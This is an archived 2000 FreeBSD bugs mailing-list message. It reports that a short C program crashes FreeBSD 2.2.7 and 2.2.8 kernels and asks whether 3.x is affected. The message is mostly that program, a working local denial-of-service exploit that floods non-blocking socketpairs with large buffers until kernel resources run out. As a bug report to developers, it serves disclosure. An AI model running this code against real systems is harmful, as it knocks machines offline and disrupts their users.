From owner-freebsd-bugs Sun Jan 2 20:49:20 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from vaview5.vavu.vt.edu (vaview5.vavu.vt.edu [198.82.158.16]) by hub.freebsd.org (Postfix) with ESMTP id 7A70D15160 for ; Sun, 2 Jan 2000 20:49:17 -0800 (PST) (envelope-from dglynn@vaview5.vavu.vt.edu) Received: from vaview5.vavu.vt.edu (vaview5.vavu.vt.edu [198.82.158.16]) by vaview5.vavu.vt.edu (8.9.3/8.9.3) with ESMTP id XAA96186 for ; Sun, 2 Jan 2000 23:49:16 -0500 (EST) (envelope-from dglynn@vaview5.vavu.vt.edu) Date: Sun, 2 Jan 2000 23:49:16 -0500 (EST) From: Greg Lynn To: freebsd-bugs@freebsd.org Subject: buffer overflow.... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This code criples 2.2.7 and 2.2.8 but I haven't tested it on any 3.x stable kernels. Does anyone know if this has been fixed with 3.x kernels? The code is fairly old... #include #include #include #define BUFFERSIZE 204800 extern int main(void) { int p[2], i; char crap[BUFFERSIZE]; while (1) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) break; i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); fcntl(p[0], F_SETFL, O_NONBLOCK); fcntl(p[1], F_SETFL, O_NONBLOCK); write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } return(0); } -thanks, Greg To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message